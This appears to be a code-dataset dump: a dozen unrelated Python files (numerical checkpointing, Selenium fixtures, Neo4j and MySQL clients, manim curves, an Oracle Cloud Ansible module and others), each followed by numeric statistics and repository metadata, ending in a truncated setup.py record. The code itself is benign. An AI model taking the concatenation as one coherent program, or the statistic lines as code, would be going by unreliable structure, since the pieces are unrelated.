# The MIT License (MIT) # # Copyright (c) 2016, Imperial College, London # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in the # Software without restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, subject to the # following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, # INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR # PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE # FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from pyrevolve import Checkpoint, Operator from devito import TimeFunction from devito.tools import flatten class CheckpointOperator(Operator): """Devito's concrete implementation of the ABC pyrevolve.Operator. This class wraps devito.Operator so it conforms to the pyRevolve API. pyRevolve will call apply with arguments t_start and t_end. Devito calls these arguments t_s and t_e so the following dict is used to perform the translations between different names. Parameters ---------- op : Operator devito.Operator object that this object will wrap. args : dict If devito.Operator.apply() expects any arguments, they can be provided here to be cached. Any calls to CheckpointOperator.apply() will automatically include these cached arguments in the call to the underlying devito.Operator.apply(). """ t_arg_names = {'t_start': 'time_m', 't_end': 'time_M'} def __init__(self, op, **kwargs): self.op = op self.args = kwargs op_default_args = self.op._prepare_arguments(**kwargs) self.start_offset = op_default_args[self.t_arg_names['t_start']] def _prepare_args(self, t_start, t_end): args = self.args.copy() args[self.t_arg_names['t_start']] = t_start + self.start_offset args[self.t_arg_names['t_end']] = t_end - 1 + self.start_offset return args def apply(self, t_start, t_end): """ If the devito operator requires some extra arguments in the call to apply they can be stored in the args property of this object so pyRevolve calls pyRevolve.Operator.apply() without caring about these extra arguments while this method passes them on correctly to devito.Operator """ # Build the arguments list to invoke the kernel function args = self.op.arguments(**self._prepare_args(t_start, t_end)) # Invoke kernel function with args arg_values = [args[p.name] for p in self.op.parameters] self.op.cfunction(*arg_values) class DevitoCheckpoint(Checkpoint): """Devito's concrete implementation of the Checkpoint abstract base class provided by pyRevolve. Holds a list of symbol objects that hold data. """ def __init__(self, objects): """Intialise a checkpoint object. Upon initialisation, a checkpoint stores only a reference to the objects that are passed into it.""" assert(all(isinstance(o, TimeFunction) for o in objects)) dtypes = set([o.dtype for o in objects]) assert(len(dtypes) == 1) self._dtype = dtypes.pop() self.objects = objects @property def dtype(self): return self._dtype def get_data(self, timestep): data = flatten([get_symbol_data(s, timestep) for s in self.objects]) return data def get_data_location(self, timestep): return self.get_data(timestep) @property def size(self): """The memory consumption of the data contained in a checkpoint.""" return sum([int((o.size_allocated/(o.time_order+1))*o.time_order) for o in self.objects]) def save(*args): raise RuntimeError("Invalid method called. Did you check your version" + " of pyrevolve?") def load(*args): raise RuntimeError("Invalid method called. Did you check your version" + " of pyrevolve?") def get_symbol_data(symbol, timestep): timestep += symbol.time_order - 1 ptrs = [] for i in range(symbol.time_order): # Use `._data`, instead of `.data`, as `.data` is a view of the DOMAIN # data region which is non-contiguous in memory. The performance hit from # dealing with non-contiguous memory is so big (introduces >1 copy), it's # better to checkpoint unneccesarry stuff to get a contiguous chunk of memory. ptr = symbol._data[timestep - i, :, :] ptrs.append(ptr) return ptrs
44.067797
129
0.68
722
5,200
4.804709
0.347645
0.025368
0.010378
0.011531
0.105794
0.081868
0.057077
0.043817
0.043817
0.043817
0
0.002288
0.243462
5,200
117
130
44.444444
0.879512
0.533269
0
0.117647
0
0
0.076023
0
0
0
0
0
0.039216
1
0.215686
false
0
0.058824
0.039216
0.45098
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
914dad243b4f6fd43e52b214d9db3b5771ad2444
623
py
Python
Perforce/AppUtils.py
TomMinor/MayaPerforce
52182c7e5c3e91e41973d0c2abbda8880e809e49
[ "MIT" ]
13
2017-03-31T21:52:19.000Z
2021-09-06T23:15:30.000Z
Perforce/AppUtils.py
TomMinor/MayaPerforce
52182c7e5c3e91e41973d0c2abbda8880e809e49
[ "MIT" ]
3
2017-05-08T02:27:43.000Z
2017-05-10T03:20:11.000Z
Perforce/AppUtils.py
TomMinor/MayaPerforce
52182c7e5c3e91e41973d0c2abbda8880e809e49
[ "MIT" ]
3
2017-05-05T14:03:03.000Z
2020-05-25T10:25:04.000Z
import os import sys import re import logging p4_logger = logging.getLogger("Perforce") # Import app specific utilities, maya opens scenes differently than nuke etc # Are we in maya or nuke? if re.match( "maya", os.path.basename( sys.executable ), re.I ): p4_logger.info("Configuring for Maya") from MayaUtils import * elif re.match( "nuke", os.path.basename( sys.executable ), re.I ): p4_logger.info("Configuring for Nuke") from NukeUtils import * else: p4_logger.warning("Couldn't find app configuration") raise ImportError("No supported applications found that this plugin can interface with")
32.789474
90
0.738363
91
623
5.010989
0.593407
0.070175
0.061404
0.074561
0.245614
0.245614
0.245614
0.245614
0.245614
0.245614
0
0.007678
0.163724
623
18
91
34.611111
0.867562
0.157303
0
0
0
0
0.305556
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e66dd75ae0bf7e3d43a0a0b5833ef2c98e86a332
581
py
Python
tests/conftest.py
artembashlak/share-youtube-to-mail
347f72ed8846b85cae8e4f39896ab54e698a6de9
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
artembashlak/share-youtube-to-mail
347f72ed8846b85cae8e4f39896ab54e698a6de9
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
artembashlak/share-youtube-to-mail
347f72ed8846b85cae8e4f39896ab54e698a6de9
[ "Apache-2.0" ]
null
null
null
import pytest from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager @pytest.fixture(scope="function") def browser(): options = webdriver.ChromeOptions() options.add_argument('ignore-certificate-errors') options.add_argument("--headless") options.add_argument('--no-sandbox') options.add_argument('start-maximized') options.add_argument('disable-infobars') options.add_argument("--disable-extensions") driver = webdriver.Chrome(ChromeDriverManager().install(), options=options) yield driver driver.quit()
30.578947
79
0.753873
62
581
6.951613
0.516129
0.139211
0.25058
0.116009
0
0
0
0
0
0
0
0
0.123924
581
18
80
32.277778
0.846758
0
0
0
0
0
0.182444
0.043029
0
0
0
0
0
1
0.066667
false
0
0.2
0
0.266667
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e66e53547faa705c9a68f28dba07b4048f2f1b31
2,335
py
Python
crusoe_observe/neo4j-client/neo4jclient/CMSClient.py
CSIRT-MU/CRUSOE
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
[ "MIT" ]
3
2021-11-09T09:55:17.000Z
2022-02-19T02:58:27.000Z
crusoe_observe/neo4j-client/neo4jclient/CMSClient.py
CSIRT-MU/CRUSOE
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
[ "MIT" ]
null
null
null
crusoe_observe/neo4j-client/neo4jclient/CMSClient.py
CSIRT-MU/CRUSOE
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
[ "MIT" ]
null
null
null
from neo4jclient.AbsClient import AbstractClient class CMSClient(AbstractClient): def __init__(self, password, **kwargs): super().__init__(password=password, **kwargs) def get_domain_names(self): """ Gets all domain names from database. :return: domain names in JSON-like form """ return self._run_query("MATCH(n:DomainName) RETURN n.domain_name AS domains") def get_ips_and_domain_names(self): """ Gets all domain names with corresponding IPs from database. :return: IPs and DomainNames in JSON-like form """ return self._run_query("MATCH(n:IP)-[:RESOLVES_TO]-(y:DomainName {tag: \'A/AAAA\'}) " "RETURN { IP: n.address , Domain: y.domain_name } AS entry") def create_cms_component(self, path): """ Create nodes and relationships for cms client. ------------- Antivirus_query: 1. Parse csv given in path. 2. Create node of type [:SoftwareVersion, :IP] if not already exists. 3. Create node of type [:Host], relationship of type [:ON] with parameters [start,end] if not already exists. Otherwise just update information about time on parameters [start,end]. 4. Create node of type [:Node], relationship of type [:HAS_ASSIGNED]. 5. Create relationship of type [:IS_A] between :Host and :Node if not already exists. :param path: Path to the JSON with values :return: """ path = f'file:///{path}' query = "CALL apoc.load.json($path) " \ "YIELD value " \ "UNWIND value.data AS data " \ "UNWIND data.cpe as cpe " \ "WITH data.ip as ip_ad, cpe, value.time as theTime " \ "MERGE (ipadd:IP {address: ip_ad}) " \ "MERGE (softVersion:SoftwareVersion {version: cpe, tag: \'cms_client\'}) " \ "MERGE (ipadd)<-[:HAS_ASSIGNED]-(nod:Node) " \ "MERGE (nod)-[:IS_A]->(host:Host) " \ "MERGE (softVersion)-[r:ON]->(host) " \ "ON CREATE SET r.start = datetime(theTime),r.end = datetime(theTime) " \ "ON MATCH SET r.end = datetime(theTime)" params = {'path': path} self._run_query(query, **params)
39.576271
117
0.576017
282
2,335
4.652482
0.393617
0.027439
0.027439
0.036585
0.108232
0.108232
0.108232
0.057927
0.057927
0.057927
0
0.003672
0.300214
2,335
58
118
40.258621
0.799266
0.321627
0
0
0
0
0.455571
0.141749
0
0
0
0
0
1
0.16
false
0.08
0.04
0
0.32
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e671c98e986dfbf41b15884e3c4cc078b893ecb2
1,040
py
Python
Python/problem1150.py
1050669722/LeetCode-Answers
c8f4d1ccaac09cda63b60d75144335347b06dc81
[ "MIT" ]
null
null
null
Python/problem1150.py
1050669722/LeetCode-Answers
c8f4d1ccaac09cda63b60d75144335347b06dc81
[ "MIT" ]
null
null
null
Python/problem1150.py
1050669722/LeetCode-Answers
c8f4d1ccaac09cda63b60d75144335347b06dc81
[ "MIT" ]
null
null
null
from typing import List from collections import Counter # class Solution: # def isMajorityElement(self, nums: List[int], target: int) -> bool: # d = Counter(nums) # return d[target] > len(nums)//2 # class Solution: # def isMajorityElement(self, nums: List[int], target: int) -> bool: # ans = 0 # for num in nums: # if num == target: # ans += 1 # return ans > len(target)//2 class Solution: def isMajorityElement(self, nums: List[int], target: int) -> bool: if not nums: return False if len(nums) == 1: return nums[0] == target p, q = 0, len(nums)-1 while p < q: if nums[p] > target: return False elif nums[p] < target: p += 1 if nums[q] < target: return False elif nums[q] > target: q -= 1 if nums[p] == nums[q] == target: return q - p + 1 > len(nums)//2
25.365854
72
0.476923
125
1,040
3.968
0.256
0.056452
0.096774
0.199597
0.47379
0.372984
0.372984
0.372984
0.372984
0.372984
0
0.019386
0.404808
1,040
40
73
26
0.781906
0.356731
0
0.15
0
0
0
0
0
0
0
0
0
1
0.05
false
0
0.1
0
0.45
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6774fb2431795bf70a9da58c9b195ced57c3c9e
839
py
Python
dev-template/src/mysql_connect_sample.py
arrowkato/pytest-CircleiCI
2f6a1460a48bf88547538cfc72880a9c86f9ec23
[ "MIT" ]
null
null
null
dev-template/src/mysql_connect_sample.py
arrowkato/pytest-CircleiCI
2f6a1460a48bf88547538cfc72880a9c86f9ec23
[ "MIT" ]
10
2020-08-24T00:25:06.000Z
2020-11-08T03:58:48.000Z
dev-template/src/mysql_connect_sample.py
arrowkato/pytest-CircleiCI
2f6a1460a48bf88547538cfc72880a9c86f9ec23
[ "MIT" ]
null
null
null
import mysql.connector from mysql.connector import errorcode config = { 'user': 'user', 'password': 'password', 'host': 'mysql_container', 'database': 'sample_db', 'port': '3306', } if __name__ == "__main__": try: conn = mysql.connector.connect(**config) cursor = conn.cursor() cursor.execute('select * from users') for row in cursor.fetchall(): print("name:" + str(row[0]) + "" + "time_zone_id" + str(row[1])) conn.close() except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: print("Something is wrong with your user name or password") elif err.errno == errorcode.ER_BAD_DB_ERROR: print("Database does not exist") else: print(err) else: conn.close()
28.931034
76
0.587604
99
839
4.79798
0.575758
0.117895
0.071579
0.08
0
0
0
0
0
0
0
0.009885
0.27652
839
28
77
29.964286
0.772652
0
0
0.153846
0
0
0.220501
0
0
0
0
0
0
1
0
false
0.076923
0.076923
0
0.076923
0.153846
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e677b427e6603c8fe21acf94f00727cd3ed74b7a
920
py
Python
Mundo 1/ex011.py
viniciusbonito/CeV-Python-Exercicios
6182421332f6f0c0a567c3e125fdc05736fa6281
[ "MIT" ]
null
null
null
Mundo 1/ex011.py
viniciusbonito/CeV-Python-Exercicios
6182421332f6f0c0a567c3e125fdc05736fa6281
[ "MIT" ]
null
null
null
Mundo 1/ex011.py
viniciusbonito/CeV-Python-Exercicios
6182421332f6f0c0a567c3e125fdc05736fa6281
[ "MIT" ]
null
null
null
# criar um programa que pergunte as dimensões de uma parede, calcule sua área e informe quantos litros de tinta # seriam necessários para a pintura, após perguntar o rendimento da tinta informado na lata print('=' * 40) print('{:^40}'.format('Assistente de pintura')) print('=' * 40) altura = float(input('Informe a altura da parede em metros: ')) largura = float(input('Informe a largura da parede em metros: ')) area = altura * largura print('\nA área total da parede é de {:.2f}m²'.format(area)) litros = float(input('\nQuantos litros contém a lata de tinta escolhida? ')) rendlata = float(input('Qual o rendimento em metros informado na lata? ')) rendlitro = rendlata / litros print('\nSe a lata possui {:.2f}L e rende {:.2f}m²'.format(litros, rendlata)) print('então o rendimento por litro é de {:.2f}m²'.format(rendlitro)) print('\nSerão necessário {:.2f}L para pintar toda a parede'.format(area / rendlitro))
46
111
0.723913
142
920
4.690141
0.443662
0.06006
0.045045
0.054054
0.039039
0
0
0
0
0
0
0.017834
0.146739
920
20
112
46
0.830573
0.216304
0
0.153846
0
0
0.527121
0
0
0
0
0
0
1
0
false
0
0
0
0
0.538462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e677b75c2a6dcc29dc727e2cdc804229c99df35d
591
py
Python
Python/Mundo 3/ex088.py
henrique-tavares/Coisas
f740518b1bedec5b0ea8c12ae07a2cac21eb51ae
[ "MIT" ]
1
2020-02-07T20:39:26.000Z
2020-02-07T20:39:26.000Z
Python/Mundo 3/ex088.py
neptune076/Coisas
85c064cc0e134465aaf6ef41acf747d47f108fc9
[ "MIT" ]
null
null
null
Python/Mundo 3/ex088.py
neptune076/Coisas
85c064cc0e134465aaf6ef41acf747d47f108fc9
[ "MIT" ]
null
null
null
from random import sample from time import sleep jogos = list() print('-' * 20) print(f'{"MEGA SENA":^20}') print('-' * 20) while True: n = int(input("\nQuatos jogos você quer que eu sorteie? ")) if (n > 0): break print('\n[ERRO] Valor fora do intervalo') print() print('-=' * 3, end=' ') print(f'SORTEANDO {n} JOGOS', end=' ') print('-=' * 3) for i in range(n): jogos.append(sample(range(1,61), 6)) sleep(0.6) print(f'Jogo {i+1}: {jogos[i]}') print('-=' * 5, end=' ') print('< BOA SORTE >', end=' ') print('-=' * 3, end='\n\n')
17.909091
63
0.527919
88
591
3.545455
0.534091
0.102564
0.057692
0
0
0
0
0
0
0
0
0.040089
0.240271
591
33
64
17.909091
0.654788
0
0
0.090909
0
0
0.273649
0
0
0
0
0
0
1
0
false
0
0.090909
0
0.090909
0.545455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e678937ffa958feedad60c6818f9966146fc7fd7
229
py
Python
tests/list/list03.py
ktok07b6/polyphony
657c5c7440520db6b4985970bd50547407693ac4
[ "MIT" ]
83
2015-11-30T09:59:13.000Z
2021-08-03T09:12:28.000Z
tests/list/list03.py
jesseclin/polyphony
657c5c7440520db6b4985970bd50547407693ac4
[ "MIT" ]
4
2017-02-10T01:43:11.000Z
2020-07-14T03:52:25.000Z
tests/list/list03.py
jesseclin/polyphony
657c5c7440520db6b4985970bd50547407693ac4
[ "MIT" ]
11
2016-11-18T14:39:15.000Z
2021-02-23T10:05:20.000Z
from polyphony import testbench def list03(x, y, z): a = [1, 2, 3] r0 = x r1 = y a[r0] = a[r1] + z return a[r0] @testbench def test(): assert 4 == list03(0, 1 ,2) assert 5 == list03(2, 1 ,3) test()
14.3125
31
0.515284
41
229
2.878049
0.512195
0.20339
0
0
0
0
0
0
0
0
0
0.141026
0.318777
229
15
32
15.266667
0.615385
0
0
0
0
0
0
0
0
0
0
0
0.166667
1
0.166667
false
0
0.083333
0
0.333333
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e67abeee75de516885fc3f200a8feafafe7fd320
2,313
py
Python
manimlib/mobject/functions.py
parmentelat/manim
f05f94fbf51c70591bed3092587a5db0de439738
[ "MIT" ]
1
2021-02-04T12:54:36.000Z
2021-02-04T12:54:36.000Z
manimlib/mobject/functions.py
parmentelat/manim
f05f94fbf51c70591bed3092587a5db0de439738
[ "MIT" ]
null
null
null
manimlib/mobject/functions.py
parmentelat/manim
f05f94fbf51c70591bed3092587a5db0de439738
[ "MIT" ]
null
null
null
from manimlib.constants import * from manimlib.mobject.types.vectorized_mobject import VMobject from manimlib.utils.config_ops import digest_config from manimlib.utils.space_ops import get_norm class ParametricCurve(VMobject): CONFIG = { "t_range": [0, 1, 0.1], "min_samples": 10, "epsilon": 1e-8, # TODO, automatically figure out discontinuities "discontinuities": [], "smoothing": True, } def __init__(self, t_func, t_range=None, **kwargs): digest_config(self, kwargs) if t_range is not None: self.t_range[:len(t_range)] = t_range # To be backward compatible with all the scenes specifying t_min, t_max, step_size self.t_range = [ kwargs.get("t_min", self.t_range[0]), kwargs.get("t_max", self.t_range[1]), kwargs.get("step_size", self.t_range[2]), ] self.t_func = t_func VMobject.__init__(self, **kwargs) def get_point_from_function(self, t): return self.t_func(t) def init_points(self): t_min, t_max, step = self.t_range jumps = np.array(self.discontinuities) jumps = jumps[(jumps > t_min) & (jumps < t_max)] boundary_times = [t_min, t_max, *(jumps - self.epsilon), *(jumps + self.epsilon)] boundary_times.sort() for t1, t2 in zip(boundary_times[0::2], boundary_times[1::2]): t_range = [*np.arange(t1, t2, step), t2] points = np.array([self.t_func(t) for t in t_range]) self.start_new_path(points[0]) self.add_points_as_corners(points[1:]) if self.smoothing: self.make_smooth() return self class FunctionGraph(ParametricCurve): CONFIG = { "color": YELLOW, "x_range": [-8, 8, 0.25], } def __init__(self, function, x_range=None, **kwargs): digest_config(self, kwargs) self.function = function if x_range is not None: self.x_range[:len(x_range)] = x_range def parametric_function(t): return [t, function(t), 0] super().__init__(parametric_function, self.x_range, **kwargs) def get_function(self): return self.function def get_point_from_function(self, x): return self.t_func(x)
31.684932
90
0.609166
313
2,313
4.239617
0.28115
0.058779
0.045215
0.030143
0.165787
0.096458
0.055765
0
0
0
0
0.016598
0.270644
2,313
72
91
32.125
0.770006
0.054907
0
0.071429
0
0
0.036647
0
0
0
0
0.013889
0
1
0.125
false
0
0.071429
0.071429
0.357143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e68358c694510e180fb49e743ec559c977aea7b6
1,467
py
Python
src/HandNetwork.py
xausky/hand-network
e885003c5bb9157cd06dc3ea3aabddbb7162a0ab
[ "MIT" ]
2
2017-04-18T03:31:06.000Z
2017-06-08T10:27:59.000Z
src/HandNetwork.py
xausky/hand-network
e885003c5bb9157cd06dc3ea3aabddbb7162a0ab
[ "MIT" ]
null
null
null
src/HandNetwork.py
xausky/hand-network
e885003c5bb9157cd06dc3ea3aabddbb7162a0ab
[ "MIT" ]
null
null
null
#!/usr/bin/python3 #-*- coding: utf-8 -*- import urllib.parse import json import base64 import requests import logging class Network(): LOGIN_URL = 'http://192.168.211.101/portal/pws?t=li' BEAT_URL = 'http://192.168.211.101/portal/page/doHeartBeat.jsp' COMMON_HERADERS = { 'Accept-Language': 'en-US', 'Accept': 'text/html' } def __init__(self, username, password): b64Password = base64.b64encode(bytes(password,'utf8')) self.data = {'userName': username, 'userPwd': b64Password} def login(self): logging.info('login:%s'%(self.data)) response = requests.post(Network.LOGIN_URL, data=self.data, headers=Network.COMMON_HERADERS, timeout=3) responseText = base64.b64decode(response.text + '==') responseJson = urllib.parse.unquote(responseText.decode('utf8')) jsonDict = json.loads(responseJson) heartBeatCyc = jsonDict.get('heartBeatCyc') if heartBeatCyc == None: raise BaseException(responseJson) logging.info('login seccuss: %s'%(responseJson)) self.heartBeatCyc = int(heartBeatCyc) self.serialNo = jsonDict.get('serialNo') return self.heartBeatCyc def beat(self): response = requests.post(Network.BEAT_URL, data={'serialNo': self.serialNo}, headers=Network.COMMON_HERADERS, timeout=3) if response.text.find('v_failedTimes') is -1: raise BaseException(response.text)
36.675
84
0.657805
166
1,467
5.740964
0.46988
0.044071
0.03148
0.027282
0.128017
0.128017
0.052466
0
0
0
0
0.03856
0.204499
1,467
39
85
37.615385
0.778063
0.025903
0
0.058824
0
0
0.149965
0
0
0
0
0
0
1
0.088235
false
0.088235
0.147059
0
0.382353
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e6885b17b97915311f8a8bd86b9f72a31641ef6d
7,392
py
Python
plugins/modules/oci_database_management_object_privilege_facts.py
LaudateCorpus1/oci-ansible-collection
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
[ "Apache-2.0" ]
null
null
null
plugins/modules/oci_database_management_object_privilege_facts.py
LaudateCorpus1/oci-ansible-collection
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
[ "Apache-2.0" ]
null
null
null
plugins/modules/oci_database_management_object_privilege_facts.py
LaudateCorpus1/oci-ansible-collection
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # Copyright (c) 2020, 2022 Oracle and/or its affiliates. # This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Apache License v2.0 # See LICENSE.TXT for details. # GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { "metadata_version": "1.1", "status": ["preview"], "supported_by": "community", } DOCUMENTATION = """ --- module: oci_database_management_object_privilege_facts short_description: Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure description: - Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure - Gets the list of Object Privileges granted for the specified user. version_added: "2.9.0" author: Oracle (@oracle) options: managed_database_id: description: - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the Managed Database. type: str required: true user_name: description: - The name of the user whose details are to be viewed. type: str required: true name: description: - A filter to return only resources that match the entire name. type: str sort_by: description: - The field to sort information by. Only one sortOrder can be used. The default sort order for 'NAME' is ascending. The 'NAME' sort order is case-sensitive. type: str choices: - "NAME" sort_order: description: - The option to sort information in ascending ('ASC') or descending ('DESC') order. Ascending order is the default order. type: str choices: - "ASC" - "DESC" extends_documentation_fragment: [ oracle.oci.oracle ] """ EXAMPLES = """ - name: List object_privileges oci_database_management_object_privilege_facts: # required managed_database_id: "ocid1.manageddatabase.oc1..xxxxxxEXAMPLExxxxxx" user_name: user_name_example # optional name: name_example sort_by: NAME sort_order: ASC """ RETURN = """ object_privileges: description: - List of ObjectPrivilege resources returned: on success type: complex contains: name: description: - The name of the privilege on the object. returned: on success type: str sample: name_example schema_type: description: - The type of the object. returned: on success type: str sample: schema_type_example owner: description: - The owner of the object. returned: on success type: str sample: owner_example grantor: description: - The name of the user who performed the grant returned: on success type: str sample: grantor_example hierarchy: description: - Indicates whether the privilege was granted with the HIERARCHY OPTION (YES) or not (NO) returned: on success type: str sample: YES object: description: - The name of the object. The object can be any object, including tables, packages, indexes, sequences, and so on. returned: on success type: str sample: object_example grant_option: description: - Indicates whether the privilege was granted with the GRANT OPTION (YES) or not (NO) returned: on success type: str sample: YES common: description: - "Indicates how the grant was made. Possible values: YES if the role was granted commonly (CONTAINER=ALL was used) NO if the role was granted locally (CONTAINER=ALL was not used)" returned: on success type: str sample: YES inherited: description: - Indicates whether the role grant was inherited from another container (YES) or not (NO) returned: on success type: str sample: YES sample: [{ "name": "name_example", "schema_type": "schema_type_example", "owner": "owner_example", "grantor": "grantor_example", "hierarchy": "YES", "object": "object_example", "grant_option": "YES", "common": "YES", "inherited": "YES" }] """ from ansible.module_utils.basic import AnsibleModule from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import ( OCIResourceFactsHelperBase, get_custom_class, ) try: from oci.database_management import DbManagementClient HAS_OCI_PY_SDK = True except ImportError: HAS_OCI_PY_SDK = False class ObjectPrivilegeFactsHelperGen(OCIResourceFactsHelperBase): """Supported operations: list""" def get_required_params_for_list(self): return [ "managed_database_id", "user_name", ] def list_resources(self): optional_list_method_params = [ "name", "sort_by", "sort_order", ] optional_kwargs = dict( (param, self.module.params[param]) for param in optional_list_method_params if self.module.params.get(param) is not None ) return oci_common_utils.list_all_resources( self.client.list_object_privileges, managed_database_id=self.module.params.get("managed_database_id"), user_name=self.module.params.get("user_name"), **optional_kwargs ) ObjectPrivilegeFactsHelperCustom = get_custom_class("ObjectPrivilegeFactsHelperCustom") class ResourceFactsHelper( ObjectPrivilegeFactsHelperCustom, ObjectPrivilegeFactsHelperGen ): pass def main(): module_args = oci_common_utils.get_common_arg_spec() module_args.update( dict( managed_database_id=dict(type="str", required=True), user_name=dict(type="str", required=True), name=dict(type="str"), sort_by=dict(type="str", choices=["NAME"]), sort_order=dict(type="str", choices=["ASC", "DESC"]), ) ) module = AnsibleModule(argument_spec=module_args) if not HAS_OCI_PY_SDK: module.fail_json(msg="oci python sdk required for this module.") resource_facts_helper = ResourceFactsHelper( module=module, resource_type="object_privilege", service_client_class=DbManagementClient, namespace="database_management", ) result = [] if resource_facts_helper.is_list(): result = resource_facts_helper.list() else: resource_facts_helper.fail() module.exit_json(object_privileges=result) if __name__ == "__main__": main()
30.92887
133
0.626759
822
7,392
5.453771
0.284672
0.029668
0.037921
0.046844
0.274593
0.228418
0.154584
0.147223
0.116663
0.073388
0
0.004805
0.296131
7,392
238
134
31.058824
0.856813
0.05533
0
0.265
0
0.015
0.648114
0.03242
0
0
0
0
0
1
0.015
false
0.005
0.03
0.005
0.065
0.005
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e68c436db086a9f75f4ec9a1c59f8bdd8afa7f45
1,028
py
Python
src/simple_report/xls/document.py
glibin/simple-report
1e68b2fe568d6f7a7d9332d0e83b9a21661419e0
[ "Apache-2.0" ]
null
null
null
src/simple_report/xls/document.py
glibin/simple-report
1e68b2fe568d6f7a7d9332d0e83b9a21661419e0
[ "Apache-2.0" ]
null
null
null
src/simple_report/xls/document.py
glibin/simple-report
1e68b2fe568d6f7a7d9332d0e83b9a21661419e0
[ "Apache-2.0" ]
null
null
null
#coding: utf-8 import xlrd from simple_report.core.document_wrap import BaseDocument, SpreadsheetDocument from simple_report.xls.workbook import Workbook from simple_report.xls.output_options import XSL_OUTPUT_SETTINGS class DocumentXLS(BaseDocument, SpreadsheetDocument): """ Обертка для отчетов в формате XLS """ def __init__(self, ffile, tags=None, **kwargs): self.file = ffile self._workbook = Workbook(ffile, **kwargs) @property def workbook(self): """ Получение рабочей книги :result: рабочая книга """ return self._workbook def build(self, dst): """ Сборка отчета :param dst: путь до выходного файла :result: """ self._workbook.build(dst) def __setattr__(self, key, value): if key in XSL_OUTPUT_SETTINGS: setattr(self._workbook, key, value) else: super(DocumentXLS, self).__setattr__(key, value)
25.7
79
0.614786
109
1,028
5.568807
0.53211
0.079077
0.079077
0.062603
0
0
0
0
0
0
0
0.001389
0.299611
1,028
39
80
26.358974
0.841667
0.150778
0
0
0
0
0
0
0
0
0
0
0
1
0.222222
false
0
0.222222
0
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e692cff5589dc59f4785c76fbfa11c53ff5a1d4e
305
py
Python
setup.py
arokem/afq-deep-learning
61d7746f03914d63c56253d10d0f6a21e6c78e90
[ "BSD-3-Clause" ]
null
null
null
setup.py
arokem/afq-deep-learning
61d7746f03914d63c56253d10d0f6a21e6c78e90
[ "BSD-3-Clause" ]
null
null
null
setup.py
arokem/afq-deep-learning
61d7746f03914d63c56253d10d0f6a21e6c78e90
